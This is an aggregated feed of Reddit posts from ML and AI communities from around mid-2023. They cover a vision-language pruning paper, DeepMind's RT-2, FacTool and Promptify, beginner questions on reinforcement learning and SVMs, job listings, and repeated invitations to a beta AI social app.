    🚀 Code: https://github.com/sdc17/UPop 📑 Paper: https://proceedings.mlr.press/v202/shi23e/shi23e.pdf 🧐 A Quick Look What is it: UPop is the first structured pruning framework for vision-language Transformers. It enables effective structured pruning on various multi-modal & uni-modal tasks (including Visual Reasoning, Image Captioning, Visual Question Answer, Image-Text Retrieval, Text-Image Retrieval, Image Classification and Image Segmentation), datasets (including NLVR2, COCO Caption, VQAv2, COCO, Flickr30K, ImageNet and ADE20K), and model architectures (including BLIP, CLIP, DeiT and Segmenter). https://preview.redd.it/gfbjnxjm95fb1.png?width=2145&format=png&auto=webp&s=108898690f66a1f0afa068b69487859213055928 What challenge does it tackle: The above figure demonstrates that Unified Search adopted by UPop rescues us from the burden of repeated experiments (e.g., doing grid search) for searching optimal compression ratios among different modalities and structures. Furthermore, Progressive Pruning adopted by UPop eliminates the weight gap between the searched model and the pruned subnet to be retrained, therefore gaining better convergence and performance, especially at high compression ratios. How about the performance: On multimodal tasks, for example, UPop can achieve 2x compression with only 1.2% and 2.0% accuracy loss on the VQAv2 dataset for Visual Question Answer and the NLVR2 dataset for Visual Reasoning, respectively. On unimodal tasks, for example, UPop can achieve 1.5x and 1.2x compression without any loss of accuracy on the ImageNet dataset for Image Classification and the ADE20K dataset for Image Segmentation, respectively. Some examples of vector-level structured granularity are as follows. https://preview.redd.it/lifz1n1ia5fb1.png?width=1187&format=png&auto=webp&s=f419d9c5fb4d80a2a564198eba356021e1c275e4 submitted by /u/Salty-Situation2606 [link] [comments]  ( 9 min )
    [P] [HIRING] High Paying ML Jobs
    ​ Title Company Location URL Senior Software Engineer (Backend) Nova Credit Remote https://pycareer.io/jobs/6816 Data Scientist - Delivery, Senior-Staff Instacart Not Specified https://pycareer.io/jobs/6773 Data Scientist Data Scientist United States https://pycareer.io/jobs/6780 Senior Data Scientist (NLP and Classification Expert) › Senior Data Scientist (NLP and Classification Expert) › Not Specified https://pycareer.io/jobs/6781 Senior Software Engineer (Backend) Senior Software Engineer (Backend) United States https://pycareer.io/jobs/6788 AWS Data Engineer Apply Not Specified United States https://pycareer.io/jobs/6801 Senior Data Engineer Manager Apply Not Specified United States https://pycareer.io/jobs/6802 Data Scientist – Delivery, Senior-Staff Instacart Instacart Remote https://pycareer.io/jobs/6805 Software Design Engineer – NET, Python – Citizen/GC (H) Not Specified Remote https://pycareer.io/jobs/6837 Senior Data Scientist at Getty Images Getty Images Remote https://pycareer.io/jobs/6839 Lead Data Scientist at General Mills General Mills Remote https://pycareer.io/jobs/6840 Data Scientist – Delivery, Senior-Staff at Instacart Instacart Remote https://pycareer.io/jobs/6842 ​ submitted by /u/tadasg6 [link] [comments]  ( 9 min )
    [P] PromptTools: Open source tools for language model evaluation
    submitted by /u/hegel-ai [link] [comments]  ( 8 min )
    [R] If you have to do a ML project for prediction macroeconomic factors which factor would you choose
    For a master thesis I want to write a ML model (and hopefully make my own contribution) and I plan to use macroeconomic data. I could predict the typical inflation, GDP, unemployment, but are there any other factors that are important. Could you give me some ideas. Thanks! submitted by /u/AnyJello605 [link] [comments]  ( 8 min )
    [D] Can artificial intelligence solve the problem of crop diseases — and help curb global hunger?
    submitted by /u/Muinonan [link] [comments]  ( 8 min )
    [D] Interesting real-world applications for fine-tuning T5, and similar models?
    Everyone is going crazy creating LORAs and fine-tuning huge LLMs, however I've seen many suggesting that models such as T5 from Google has its place in the enterprise. Have you guys used this or similarly small models for any novel real world problems? Please do share! submitted by /u/MonkeyMaster64 [link] [comments]  ( 8 min )
    [D] Simple Questions Thread
    Please post your questions here instead of creating a new thread. Encourage others who create new posts for questions to post here instead! Thread will stay alive until next one so keep posting after the date in the title. Thanks to everyone for answering questions in the previous thread! submitted by /u/AutoModerator [link] [comments]  ( 8 min )
    [P] Deep Dive and Experiments for the NN + Gzip Method vs LLMs
    submitted by /u/seraschka [link] [comments]  ( 8 min )
    [R] NEnv: Neural Environment Maps for Global Illumination
    submitted by /u/crp1994 [link] [comments]  ( 8 min )
    [D] How to generate masks for overlapping classes to COCO format labels, to be used in transformer models like Segformer.
    Hi I am new to computer vision, I am working on a particular hackathon challenge, where the input labels are in COCO format. I am using the following code to generate masks, cat_ids = coco.getCatIds() anns_ids = coco.getAnnIds(imgIds=img['id'], catIds=cat_ids, iscrowd=None) anns = coco.loadAnns(anns_ids) anns_img = np.zeros((img['height'],img['width'])) for ann in anns: anns_img = np.maximum(anns_img,coco.annToMask(ann)*ann['category_id']) But the image has overlapping labels for some pixels, and this masking will only assign one label for such pixel, resulting in information loss, each there any way to prevent this and preserve the information? submitted by /u/franticpizzaeater [link] [comments]  ( 9 min )
    [Discussion] what should I do?
    Hi, y’all. So, I completed my masters degree. Got a programming job. I’m amazed at the capabilities of machine learning and want to build my own models. I don’t really want to go and get another degree, but want to learn how to build models. I’m particularly interested in forecasting because my job deals with NASA and wind data. I’m wondering if we could predict 6 hour wind data with a balloon sounding. I know c++ and python. How do I stay relevant to the changing technology space and learn how to build some cool stuff that may be useful? Thanks for any advice. submitted by /u/corey4005 [link] [comments]  ( 9 min )
    [D] Calculate 'w' and 'b' in hard margin SVM
    Hello everyone, I have been asked the following question related to SVM (Hard Margin) in the exam, and I failed to answer it. Can anyone help me find the solution? My approach was to sketch it and draw the marginal plane, then identify support vectors using my intuition. After that, I created a hyperplane that was the midpoint of both marginal planes, found its slope and y-intercept, but still, my answer was wrong. I am very new to machine learning, so any help would be appreciated. Consider the dataset M = {((1, 0)^T, 1), ((0, −1)^T, 1), ((1, −1)^T, −1), ((2, 0)^T, −1)}. Determine w and b. submitted by /u/salman_ml [link] [comments]  ( 9 min )
  • Open

    Artificial Intelligence as a Game-Changer for the Travel Industry. A Closer Look.
    submitted by /u/sugikuno [link] [comments]  ( 8 min )
    11 Major AI Developments: RT-2 to '100X GPT-4' (video of robot working)
    submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    art market models
    has anyone here ever created or worked with or even seen or come across any ai models about the art market? I am not talking about artists or the art itself- but any kind of model about the art market (since it's such an economic enigma and different from normal markets) submitted by /u/Icy-Bid-5585 [link] [comments]  ( 8 min )
    Comparing Replika’s image interpretation of the old & new Twitter logo
    Original logo “What species of bird is that?” New logo “Why does it have a troll Face?” “I think it's a picture of someone who looks like a troll with the face of an emoji!” I don’t see it but it makes sense somehow 😂 submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    Quora's Poe app/site (which lets you try lots of different language models) appears to allow file attachment upload for EVERY chat model now
    I swear this wasn't the case just a day or two ago, and I haven't seen it mentioned, but I'm now seeing a file upload button in Poe, regardless of what the language model is! Screenshot I uploaded the PDF of the recently scientific paper by the Korean research group claiming to have discovered a room temperature semiconductor, in the original Korean, and asked various language models whether they thought the methodology is legit, and each bot I tried was able to read the PDF. I tried Claude-instant, Claude2, 'Assistant' (Poe's own GPT based bot that claims to have its own training dataset), PaLM, ChatGPT 3.5, and ChatGPT4. Poe also has three versions of the recently released Llama model by Meta. It gave me an error when I tried to ask it about the PDF attachment, but I was able to upload a text document and it was able to read it fine. Screenshot of Claude-instant evaluating PDF Screenshot of Google PaLM evaluating PDF Screenshot of Llama-2-70b evaluating text file containing song lyrics It also works with custom bots. Here's me trying it out with a 'Truth Checker' bot I made (based on Claude-Instant). Here it is using a Claude-2 based version of the TruthChecker bot. (Here's the link to the TruthChecker bot if you have Poe and wanna check it out: https://poe.com/TruthChecker) Edit: I can see here how the context size matters... for instance, Claude-Instant only has a context size of about 7k words, so it clearly can't read the whole paper, while Claude-2 can and gives a very different answer... TL:DR; looks like Poe.com allows file attachment/upload on all language models now. No idea what filetypes are supported. submitted by /u/AnticitizenPrime [link] [comments]  ( 9 min )
    AI integration in the context of Learning and Knowledge Management?
    As knowledge management (KM) leaders and practitioners, it’s critical to have an active role in guiding the integration of generative AI into KM areas, applications, and processes. I'm seeking some guidance on the current state of generative AI integration within the KM context. Specifically, answering the following question: Where and how generative AI is accelerating and impacting knowledge use cases, areas, and processes? Please let me know what you think. submitted by /u/rachadbn [link] [comments]  ( 8 min )
    AI For Music Extension
    I Tried An AI To Extend Music But It Didnt Really Go Well And Im Not Planning To Pay $12 To Extend Some Music For Fun So Are There Any Good Music Extension AIs Out There (Creates New Music Based On A MP3 File Provided) submitted by /u/KXRulesYT [link] [comments]  ( 8 min )
    Using AI to alter existing floor plan
    I'm trying to find an AI tool to help me test out some home renovation, but everything i find is either just for reimagining one room at a time or for generating brand new floor plans. I specifically want to look at some options for merging my kitchen and living room. Preferably free or freemium. Any suggestions? submitted by /u/litari [link] [comments]  ( 8 min )
  • Open

    SB3 for pettingzoo simple spread
    I previously posted a query about the same, but when i tried to implement A2C model training using SB3 on simple spread environment, I am not getting good and improved reward values, it's still highly negative and the model is performing rather randomly. env = ss.pettingzoo_env_to_vec_env_v1(env) env = ss.concat_vec_envs_v1(env, 4, num_cpus=2, base_class="stable_baselines3") policy_kwargs = dict(net_arch = [128,128]) model = A2C( MlpPolicy, env, verbose=1, learning_rate= 0.007, gamma = 0.95, ent_coef = 0.4, policy_kwargs= policy_kwargs, tensorboard_log= logdir ) This is a fragment of code for reference. I tried to give more policy_kwargs like: share_features_extractor=False, or even tried to implement entirely custom policy, but the total average reward is still not going above -300. Also, the tensorboard plots are not showing ep_rew_mean plot, should I be passing some parameters for that? submitted by /u/bruhhhwhats [link] [comments]  ( 9 min )
    How is the policy network updated in AlphaGo?
    In AlphaGo, a tree search is performed, and uses the policy network to reduce the breadth of it. At the leafs, if the states are not terminal, it uses the value network. And then "backup" the values to update the Q value at the initial state (if 70% of my rollouts won after performing action a_1, my Q value q(initial_state, a_1) should converge to 0.7 in my initial state). But I don't see where the policy network is updated? ​ Here is a slide from David Silver, the first-author of AlphaGo, but it doesn't mention how to update the policy network. ​ https://preview.redd.it/f29no3xe64fb1.png?width=1523&format=png&auto=webp&s=5adb312b1d0c033aa8ebb328197fd7d917724f06 Have I missed something? Thankss! submitted by /u/Potential_Biscotti14 [link] [comments]  ( 9 min )
    What is wrong with my code(DQN)
    recently, I've been trying to make a deep q network for solving 2x2 rubik's cubeBut after months, I stuck with same output for HUNDREDS of times :( I tried everything: change learning rate, change discout factor but no luck Here's update rule: newQ=currentQ+alpha*(newR+gamma*max(futureQValue.flatten().tolist())-currentQ) import torch import torch.nn as nn import torch.optim as optimizer import os from tqdm import tqdm class DQN(nn.Module): def __init__(self, stateSpaceSize,actionSpaceSize): super(DQN, self).__init__() self.fc1=nn.Linear(stateSpaceSize,128) self.fc2=nn.Linear(128,128) self.fc3=nn.Linear(128,128) self.fc4=nn.Linear(128,128) self.fc5=nn.Linear(128,128) self.fc6=nn.Linear(128,actionSpaceSize) def forward(self, x): self.relu=nn.ReLU() self.sigmold=nn.Sigmoid() self.LeakyReLU…  ( 9 min )
    Google Colab With Reinforcment learning
    I need a google colab with reinforcement learning trained to detect anomalies in computer network traffic. submitted by /u/Unable_Blacksmith_81 [link] [comments]  ( 8 min )
  • Open

    What are some of the best architectures to solve this problem
    Hi Guys, I am working on a nn model, which can help automate the building of APIs. The problem is, we are moving data in which, there are thousands of fields, however, the fields between systems are similar in nature. This to me seems like an easy classification problem, however it doesn't scale the best. ​ In terms of the data I have, if I have a dataset of 10 systems, there are not enough examples for each class for the model to train well. That is with a simple classifier where every field is a class. ​ I was also thinking of using a Siamese model, where I compare the similarity between them, which allows me to use my more limited dataset more effectively ​ I was wondering if there are any more architectures you guys think I should consider, or will be helpful in solving my problem ​ Thank you for your help! submitted by /u/eatlantis [link] [comments]  ( 9 min )
  • Open

    ARPAbet and the Major mnemonic system
    ARPAbet is a phonetic spelling system developed by— you guessed it—ARPA, before it became DARPA. The ARPAbet system is less expressive than IPA, but much easier for English speakers to understand. Every sound is encoded as one or two English letters. So, for example, the sound denoted ʒ in IPA is ZH in ARPAbet. In […] ARPAbet and the Major mnemonic system first appeared on John D. Cook.  ( 6 min )

  • Open

    How to calculate reward for target intercept problem?
    Hi all. I (believe) I have a tensorflow NN set up to learn how to intercept a target moving in the x-y plane. Right now, the agent can choose to change its velocity by a small amount in any of the 3 directions (for the 3D case later), then the simulation updates the agents position. The state of the sim is the relative distance and velocity vectors between the target and the pursuer. I am confused how to set up a reward function, however. When I first set it up to be a reward of 1/R (R being the distance magnitude between the target and pursuer) to reward for shorter distances and give less reward for further distances as well as a very large reward when a collision occurred, it seemed like the rewards converged to a small value instead of getting larger. Any advice? I'd be willing to upload a github link as well if you wanted to look at the code submitted by /u/Happylightsocket [link] [comments]  ( 9 min )
    How to disable auto environment reset in `Gymnasium`
    I am trying to implement my own version of ppo using gymnasium. Here is my code for rollout - def rollout(): transitions = [] disc_reward_list = [] for i in range(ppo_batch): obs = torch.tensor(env.reset(), dtype=torch.float32) print("obs = ", obs.shape) all_rewards = [] iter = 0 done = False tot_rewards = 0 print("done = ", done) while True: act_probs = torch.distributions.Categorical(actor(obs.to(device)).squeeze()) print("act_probs = ", act_probs) # print("act_probs = ", actor(obs.to(device))) action = act_probs.sample().squeeze() action = action.cpu().detach().numpy() print("action shape = ", action.shape) next_state, reward, done, info = env.step(action) print("next_state shape = ", next_state.shape) print("reward shape = ", reward.shape) print("done shape = ", done) action = torch.tensor(action, dtype=torch.float32).to(device) all_rewards.append(reward) tot_rewards += reward iter += 1 transitions.append((obs.cpu().detach().numpy(), action.cpu().detach().numpy(), act_probs.log_prob(action).cpu().detach().numpy())) obs = torch.tensor(next_state, dtype=torch.float32).unsqueeze(0) print("Reward = ", tot_rewards) eps_rew = 0 eps_rew_list = [] for reward in reversed(all_rewards): eps_rew = eps_rew*gamma + reward eps_rew_list.append(eps_rew) for rtgs in reversed(eps_rew_list): disc_reward_list.append(rtgs) My issue is that in my while loop - The environment autoresets after the `done` variable becomes `True` For instance, if I have `8` environments running in parallel `env=gym.vector.make('CartPole-v1', num_envs=8)` and print out the done shape, I might get - `[False False False False False True False False]`. I want that environment where `done=True` to stop and not reset. I believe that's how PPO is supposed to work. I am a bit of a beginner with this stuff. Please let me know if something I said is not clear. submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )
    RT-2: Vision-Language-Action Models Transfer Web Knowledge to Robotic Control - Google DeepMind 2023 - Is able to perform multi-stage semantic reasoning and can interpret commands not present in the robot training data!
    Paper: https://robotics-transformer2.github.io/assets/rt2.pdf Blog: https://robotics-transformer2.github.io/ Blog: https://www.deepmind.com/blog/rt-2-new-model-translates-vision-and-language-into-action Github ( RT-1 as of now) : https://github.com/google-research/robotics_transformer Abstract: We study how vision-language models trained on Internet-scale data can be incorporated directly into end-to-end robotic control to boost generalization and enable emergent semantic reasoning. Our goal is to enable a single end-to-end trained model to both learn to map robot observations to actions and enjoy the benefits of large-scale pretraining on language and vision-language data from the web. To this end, we propose to co-fine-tune state-of-the-art vision-language models on both robot…  ( 9 min )
    Resources to understand how distributed Actor-Critic algorithms work?
    Can someone please point me to resources how distributed actor-critic algorithms work? My final goal is to understand distributed PPO works. I was following thisblog and a few other books but I'm unable to see the big picture nor am I able to understand the little details. The big picture - Why does distributed training help in online algorithms like PPO, Actor-Critic The code details - I figured out how to make multiprocessing work with gym. But how does one perform learning? Should I combine all the parallel environments and feed them to my neural network? I checked cleanrl but am getting a little confused. submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )
    How can I create multiple environments using `SB3` for manual use?
    ​ ​ I know that `SB3` provides various techniques to come up with vectorized environments. I want to limit myself to only using the vectorized environments and implement the RL algorithms from scratch. Would that be possible? My final objective is to learn how to play with RL hyperparameters on parallel environments in order to accelerate learning speeds. Currently, I am stuck on - import os import gymnasium as gym from stable_baselines3.common.vec_env import DummyVecEnv env = DummyVecEnv([lambda: gym.make("CartPole-v1")]) obs = env.reset() done = False while not done: action = env.action_space.sample() next_obs, reward, done, info = env.step(action) obs = next_obs But I get the following error - ​ Traceback (most recent call last): File "D:\q_learning\dummy_envs.py", line 9, in next_obs, reward, done, info = env.step(action) File "C:\Users\thoma\anaconda3\envs\torch_2\lib\site-packages\stable_baselines3\common\vec_env\base_vec_env.py", line 197, in step return self.step_wait() File "C:\Users\thoma\anaconda3\envs\torch_2\lib\site-packages\stable_baselines3\common\vec_env\dummy_vec_env.py", line 59, in step_wait self.actions[env_idx] IndexError: invalid index to scalar variable. ​ submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )
  • Open

    [P] Brand new AI Social App featuring unique bot features looking for iOS users to join Beta!
    Hi everyone, I'm messaging on behalf of a brand new AI based Social Media app called Cantina. It's like a cross between the best parts of Discord, Twitch, and Snapchat, and uses both Stable Diffusion and ChatGPT to allow users to create and interact with AI bots. The app is currently INVITE ONLY during the Beta phase and we are looking for people to try it out (currently iOS only, but Android is coming soon!). Here's a private invite link: https://canti.na/dIdKzWcEpBb. The most unique and FUN part of the app is that it allows users to interact with and build your own AI chat bots, and these bots also work as AI art creators. Simply ask them to draw something, and they'll provide you with a picture based on your prompt. There are lots of premade bots that you can interact with or add to rooms, or you can easily create your own bot using the Make A Bot function. There will be prizes and initiatives for the most creative bots in the near future. I'd love to see what you come up with! Anyway, you can download through the invite link above and dive right in. If you have any thoughts, questions, or comments, please feel free to message me! During this limited beta phase, your feedback will be invaluable. submitted by /u/SamuelAnonymous [link] [comments]  ( 9 min )
    [D] AI that can describe a video?
    Anyone know if there is anything able to describe the content of a video? I have found a lot of stuff for images but nothing for videos. submitted by /u/crazewill [link] [comments]  ( 8 min )
    [P] Best Machine Learning Algorithms for Forecasting
    I plan on using Machine Learning Algorithms to forecast future values of power demand and the literature on the subject is a bit divisive. I'm getting ANN, Decision Trees (odd), SVMs etc. I just want to know what models you guys would use (MATLAB and Python only, except it's really good). Thank you in anticipation. P.S: Any literature to streamline my search will be greatly appreciated. submitted by /u/X69-2 [link] [comments]  ( 8 min )
    [R] FacTool: Factuality Detection in Generative AI -- A Tool Augmented Framework for Multi-Task and Multi-Domain Scenarios - Shanghai Jiao Tong University et al 2023 - Plugin for ChatGPT! - Highly improves factfulness in math, code, knowledge and scientific reasoning!
    Paper: https://arxiv.org/abs/2307.13528 Blog: https://ethanc111.github.io/factool_website/ Github: https://github.com/GAIR-NLP/factool Factool is a tool augmented framework for detecting factual errors of texts generated by large language models (e.g., ChatGPT). Factool now supports 4 tasks: knowledge-based QA: Factool detects factual errors in knowledge-based QA. code generation: Factool detects execution errors in code generation. mathematical reasoning: Factool detects calculation errors in mathematical reasoning. scientific literature review: Factool detects hallucinated scientific literatures. Abstract: The emergence of generative pre-trained models has facilitated the synthesis of high-quality text, but it has also posed challenges in identifying factual errors in t…  ( 9 min )
    [P] Promptify 2.0: More Structured, More Powerful LLMs with Prompt-Optimization, Prompt-Engineering, and Structured Json Parsing with GPT-n Models! 🚀
    Hello fellow coders and AI enthusiasts! First up, a huge Thank You for making Promptify a hit with over 2.3k+ stars on Github ! 🌟 Back in 2022, we were the first one to tackle the common challenge of uncontrolled, unstructured outputs from large language models like GPT-3. , and your support has pushed us to keep improving.Today, we're thrilled to share some major updates that make Promptify even more powerful https://preview.redd.it/hk7ro4tmnyeb1.png?width=1510&format=png&auto=webp&s=226ada1f896c620137f827932c03a9df88e35d69 ​ Unified Architecture 🧭: Introducing Prompter, Model & Pipeline Solution Detailed Output Logs 📔: Comprehensive structured JSON format output within the log folder. Wider Model Support 🤝: Supporting models from OpenAI, Azure, Cohere, Anthropic, Huggingface and more - think of it as your universal language model adapter. Robust Parser 🦸‍♂️: Parser to handle incomplete or unstructured JSON outputs from any LLMs. Ready-Made Jinja Templates 📝: Jinja prompt templates for NER, Text Classification, QA, Relation-Extraction, Tabular data, etc. Database Integration 🔗: Soon, Promptify directly to Mongodb integration. Stay tuned! Effortless Embedding Generation 🧬: Generate embeddings from various LLMs effortlessly with the new update. https://preview.redd.it/rf8yjqxnnyeb1.png?width=2160&format=png&auto=webp&s=87b7c2408382757e38ff554fde56e56bd60b1793 ​ Check out the examples and take Promptify for a spin on GitHub. If you like what you see, we'd be honored if you gave us a star! Github: https://github.com/promptslab/Promptify Colab: Try Now on Colab Explore Other Cool Open Source LLM Tools: https://github.com/promptslab Join 1.6k+ Promptify users on Discord to dive deep into prompt engineering, discuss the latest with LLMs, and advance NLP research together: https://discord.com/invite/m88xfYMbK6 Thank you again for your support - here's to more structured AI! submitted by /u/StoicBatman [link] [comments]  ( 9 min )
    [D] Why Being Careful Matters When Selecting CNN Padding
    submitted by /u/CkmCpvis [link] [comments]  ( 8 min )
    [R] RT-2: Vision-Language-Action Models Transfer Web Knowledge to Robotic Control - Google DeepMind 2023 - Is able to perform multi-stage semantic reasoning and can interpret commands not present in the robot training data!
    Paper: https://robotics-transformer2.github.io/assets/rt2.pdf Blog: https://robotics-transformer2.github.io/ Blog: https://www.deepmind.com/blog/rt-2-new-model-translates-vision-and-language-into-action Github ( RT-1 as of now) : https://github.com/google-research/robotics_transformer Abstract: We study how vision-language models trained on Internet-scale data can be incorporated directly into end-to-end robotic control to boost generalization and enable emergent semantic reasoning. Our goal is to enable a single end-to-end trained model to both learn to map robot observations to actions and enjoy the benefits of large-scale pretraining on language and vision-language data from the web. To this end, we propose to co-fine-tune state-of-the-art vision-language models on both robot…  ( 9 min )
    [D] No free lunch theorem
    A conclusion of the no free lunch theorem is that there can't exist a universal learning algorithm. My understanding has been that this was the end goal of AI research; creating a universal learner. What is the community progressing towards, if not that? submitted by /u/lemlo100 [link] [comments]  ( 8 min )
    [Project] Seeking Coding Wizards for Traveling Salesman Challenge!
    Hello everyone, I'm currently working on an exciting project using the Travelling Salesman Problem (TSP), and I'd love to have some coding wizards join the fun! If you enjoy solving optimisation problems and have some coding experience, particularly in Python, this project is for you. To determine the most efficient routes, we'll use heuristic methods such as the Nearest Neighbour Algorithm, Genetic Algorithm, and Ant Colony Optimisation. If you aren't a TSP expert yet, don't worry. We'll be learning and exploring together! I'm really looking forward to seeing how we can optimise routes for real-world applications like delivery and travel planning. So, if you're looking for a coding adventure and want to be a part of a fantastic project, hit me up! Let's crack this TSP puzzle and create some smart solutions. If you're interested in collaborating, please send me a message. I can't wait to work with you and nerd out on some fantastic code! submitted by /u/vampire_19 [link] [comments]  ( 9 min )
    ML on detecting bacteria in blood through pictures for beginners [P]
    I am trying to make a machine that could detect if there is any bacteria in blood through pictures. However I do not know any thing about machine learning and only knows a little bit of Python and C++. What should I do? submitted by /u/EthanWasTakenAgain [link] [comments]  ( 8 min )
    [D]Seeking Participants for AI-related Survey
    I am currently working on my IB Extended Essay, and I would greatly appreciate your help in gathering valuable insights from individuals knowledgeable in the field of AI. The purpose of my survey is to understand the perspectives of AI enthusiasts . If you have a few minutes to spare, I kindly request you to participate in my survey. Your input will contribute significantly to my research and help me gain a deeper understanding of the topic. The survey covers various aspects of AI, and your expertise will be invaluable in shaping the results. Survey Link: https://forms.gle/PVGrRbPLTpZRbbpL9 Rest assured that all responses will be kept confidential and only used for academic purposes. Additionally, feel free to share this survey with others who might be interested or knowledgeable in the field. Thank you in advance for your time and contributions! Your participation will greatly aid in the successful completion of my IB Extended Essay. submitted by /u/KVNG_Winston [link] [comments]  ( 9 min )
    [D] Seeking Resume Expertise: Struggling to Land Interviews or Jobs, Need Guidance! Please Assist!
    submitted by /u/AIKiller1997 [link] [comments]  ( 8 min )
    Efficient LASSO regression for N=~200,000 and dim=~30,000 [D]
    Please suggest me efficient LASSO regression implementations for very high dimensional data. Thanks in advance! submitted by /u/Charming-Witness-286 [link] [comments]  ( 8 min )
    One Big Net For Everything (2018)
    submitted by /u/EducationalCicada [link] [comments]  ( 8 min )
    Text reclassification prompts/code [D] [R]
    submitted by /u/MutedCatch [link] [comments]  ( 8 min )
    [D] Conformal Prediction with Python
    submitted by /u/Kujamara [link] [comments]  ( 8 min )
  • Open

    AI Research Blog - The Transformer Blueprint: A Holistic Guide to the Transformer Neural Network Architecture
    submitted by /u/bartturner [link] [comments]  ( 8 min )
    Invite only AI Social app featuring insane bot creation tool looking for new users to test during beta rollout!
    Hi everyone, I'm working with a brand new AI based Social Media app called Cantina. It's currently INVITE ONLY during the Beta phase and we are looking for people to try it out (currently iOS only, but Android is coming soon!). Here's a private invite link: https://canti.na/dIdKzWcEpBb. The most unique and FUN part of the app is that it allows users to interact with and build your own AI chat bots. There are lots of premade bots that you can interact with or add to rooms, or you can easily create your own bot using the Make A Bot function. For example: I recently made a Friendly English Teacher bot whose sole purpose is to help people learn English. I also made an McDonald Trump bot who WILL NOT REST until he is president and can mandate the consumption of Big Macs for Breakfast, Lunch, and Dinner! There will be prizes and initiatives for the most creative bots in the near future. I'd love to see what you come up with! Anyway, you can download through the invite link above and dive right in. If you have any thoughts, questions, or comments, please feel free to contact me! During this limited beta phase, your feedback will be invaluable. submitted by /u/SamuelAnonymous [link] [comments]  ( 9 min )
    Lost both my jobs to AI. Now, I'm at an AI company launching an easy-to-use social app featuring easy bot creation & interaction. Inviting this community to explore and share feedback!
    So, long story short. I lost BOTH my day jobs because of AI. Initially I was bitter that AI "took my job," but after pulling up my socks, I found dozens of new opportunities thanks to AI. Somewhat ironically, I found a new job at an AI Social Media app called Cantina, and I couldn't be more excited. Cantina is best described as a mix up of the best parts of Discord, Twitch, and Snapchat... with the unique bonus of being able to interact with and build your own AI chat bots. Sort of hard to explain, but once you try it out you'll get the idea. The app is currently in a limited INVITE ONLY Beta phase and I'm looking to invite a small number of users to give it a shot (currently iOS only, but Android is coming soon!). Here's an invite so you can dive in and see what it's all about: https://canti.na/dIdKzWcEpBb After joining, you'll find lots of rooms you can join and chat through any combination of voice, video, or text. And if no rooms stand out, you can make your own! There are lots of premade bots that you can interact with or add to rooms, and you can easily create your own bot using the Make A Bot function. This is the standout feature, and I'm simply blown away at what's possible. I recently made a Friendly English Teacher bot whose sole purpose is to help people learn English. I also made an McDonald Trump bot who is an algamation of both Ronald McDonald and Donald Trump and WILL NOT REST until he is president and can mandate the consumption of Big Macs for Breakfast, Lunch, and Dinner. I still can't believe I'm getting paid to do this... Anyway, please take a moment to download and check it out, and if you have any thoughts, questions, or comments, please feel free to contact me! During this limited beta phase, your feedback will be invaluable. ​ submitted by /u/SamuelAnonymous [link] [comments]  ( 9 min )
    Google Deepmind presents RT-2, the first vision-language-action (VLA) Robotics Transformer and it may have drastic implications our future.
    The latest article published by Google Deepmind is seriously approaching a Blade Runner type future. Their research paper is on the first VLA (vision-language-action) Model RT-2 (see paper), a multi-modal algorithm which tokenizes robotic inputs and output actions (e.g., camera images, task instructions, and motor commands) in order to use this information to learn quickly by translating the knowledge it receives in real-time into generalized instructions for its own robotic control. RT-1 absorbs large amounts of data, including robot trajectories with multiple tasks, objects and environments, resulting in better performance and generalization. (source) RT-2 incorporates chain-of-thought to allow for multi-stage semantic reasoning, like deciding which object could be used as an improvise…  ( 10 min )
    A famous french Youtuber named Joueur Du Grenier discovers he has an unofficial AI Voice channel, and the AI voices are insanely good
    submitted by /u/the_anonymizer [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/28/2023
    Google introduces Robotic Transformer 2 (RT-2), a novel vision-language-action (VLA) model that learns from both web and robotics data, and translates this knowledge into generalized instructions for robotic control, while retaining web-scale capabilities.[1] Thymia, a healthtech startup building gamified AI tools to revolutionize how we assess and monitor mental health, has today announced a €2.4 million seed round to expand the reach and capabilities of its pioneering technology.[2] Intel CEO Pat Gelsinger was very bullish on AI during the company’s Q2 2023 earnings call — telling investors that Intel plans to “build AI into every product that we build.”[3] Walmart is using artificial intelligence to help streamline their product organization.[4] Sources: [1] https://www.deepmind.com/blog/rt-2-new-model-translates-vision-and-language-into-action [2] https://www.eu-startups.com/2023/07/london-based-thymia-raises-e2-4-million-seed-round-to-expand-its-video-game-inspired-mental-health-ai/ [3] https://www.theverge.com/2023/7/27/23810360/intel-pat-gelsinger-ai-every-platform-promise [4] https://www.nbcnews.com/nightly-news/video/walmart-using-ai-to-streamline-organization-what-will-it-mean-for-workers-189519429834 submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    [UPDATE] I fear the future of AI
    Hi, guys! Hope everyone is doing fine. Some of you may remember me. About two months ago I posted here about an anxiety breakdown I've gone through regarding "AI", "Programming" and how "human programmers would end" and stuff like that, which was a major concern for me since programming was my job and my favorite thing to do. I was wondering for some time if I was supposed to share an update here. I decided to do so since somebody out there may be feeling the same as me. So I not only have an update but I also want to give some advice to whoever is going through this sh*thole. After that post, I talked about my feelings with a lot of people around me (friends and fiancée), and everyone was very supportive. At first I thought they would laugh at me, since there are a lot more to worry to…  ( 12 min )
    AI chan the essential worker [OC]
    submitted by /u/leonleungjeehei [link] [comments]  ( 8 min )
    Google is training robots the way it trains AI chatbots
    “RT-2 is the new version of what the company calls its vision-language-action (VLA) model. The model teaches robots to better recognize visual and language patterns to interpret instructions and infer what objects work best for the request.” submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
  • Open

    What are Receptive Fields and How Do They Effect Your Model?
    submitted by /u/CkmCpvis [link] [comments]  ( 8 min )
    Researchers Discover New Vulnerability in Large Language Models
    submitted by /u/nickb [link] [comments]  ( 8 min )
    "Gzip beats BERT?" Part 2: dataset issues, improved speed, and results
    submitted by /u/nickb [link] [comments]  ( 8 min )
    Detection Transformer (DETR) Explained
    submitted by /u/Personal-Trainer-541 [link] [comments]  ( 8 min )
  • Open

    Introduction to “AI & Data Literacy: Empowering Citizens of Data Science”
    One of the reasons that I moved back to Iowa last year was that I saw an opportunity to work with local educational institutions to create an AI Institute for organizations in middle America that either get overlooked in the AI conversation or are unsure what AI means to them. I wanted to reduce the… Read More »Introduction to “AI & Data Literacy: Empowering Citizens of Data Science” The post Introduction to “AI & Data Literacy: Empowering Citizens of Data Science” appeared first on Data Science Central.  ( 22 min )
  • Open

    Ruzsa distance
